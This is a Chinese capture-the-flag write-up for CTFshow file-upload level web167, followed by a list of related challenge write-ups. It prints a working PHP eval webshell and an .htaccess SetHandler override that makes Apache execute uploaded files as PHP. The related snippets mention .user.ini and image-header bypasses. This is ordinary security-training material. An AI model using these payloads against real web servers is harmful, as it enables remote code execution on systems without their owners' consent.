CTFshow 文件上传 web167
目录
- 思路
- 总结
思路
根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache
可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析
<?php echo 123;eval($_POST['kradress']);?>
.htaccess
Sethandler application/x-httpd-php
<!-将该目录及子目录下的文件均按照php文件解析执行-->
再访问phtml,发现回显成功,直接RCE拿到flag
总结
…
CTFshow 文件上传 web167相关推荐
- CTFshow 文件上传 web153
目录 思路 总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上 ...
- CTFSHOW文件上传篇
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀,内容为一句话 直接访问upload/1.php然后 po ...
- ctfshow文件上传
web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了. web152-后端绕过 一模一样的步骤,应该上一题前端判 ...
- CTFshow 文件上传 web166
目录 思路 总结 思路 直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip 直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面 在上传的zi ...
- CTFshow 文件上传 web162
目录 思路 总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89aauto_prepend_file=png ...
- CTFshow 文件上传 web156
目录 思路 总结 思路 这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell. https://github.com/hunter ...
- CTFshow 文件上传 web154
目录 思路 总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png ...
- ctfshow 文件上传 web151~170
目录 web151 web 152 web 153 web 154 web 155 web 156 web 157~159 web 160 web 161 web 162~163 web 164 we ...
- CTFshow 文件上传 web165
目录 思路 总结 思路 上传jpg图片,返回包可以看出经过了二次渲染 试了很多次,群里的jpg哪来也没成功,放弃了 <?php$miniPayload = '<?php echo 123; ...
最新文章
- Linux pip安装包。解决:You should consider upgrading via the 'pip install --upgrade pip' command.
- iOS消息推送机制原理与实现
- Tarjan 算法详解
- 保险运用计算机的工作干什么,关于计算机在保险业务中的应用研究
- invester is the person whose opinion is so valuable
- Oracle——Oracle 实现类似 select top n 语句
- ubuntu系统静态路由
- (零)音视频技术基础知识,现实项目
- jQuery学习笔记--目录
- 什么时候使用mysql触发器_MySQL触发器的使用
- 同步/异步阻塞/非阻塞
- linux网络收包过程
- Nginx反向代理其他使用方式
- C语言整人小程序,慎用,谨记!
- 手把手教您怎么编写第一个单片机程序
- lumion自动保存_19条新人必看的Lumion良好操作习惯
- spring security面试
- 下载网站的ICO图标方法
- python实现whois查询_Python 工具whois查询
- python判断身份证是否合法的函数_oracle中验证身份证是否合法的函数脚本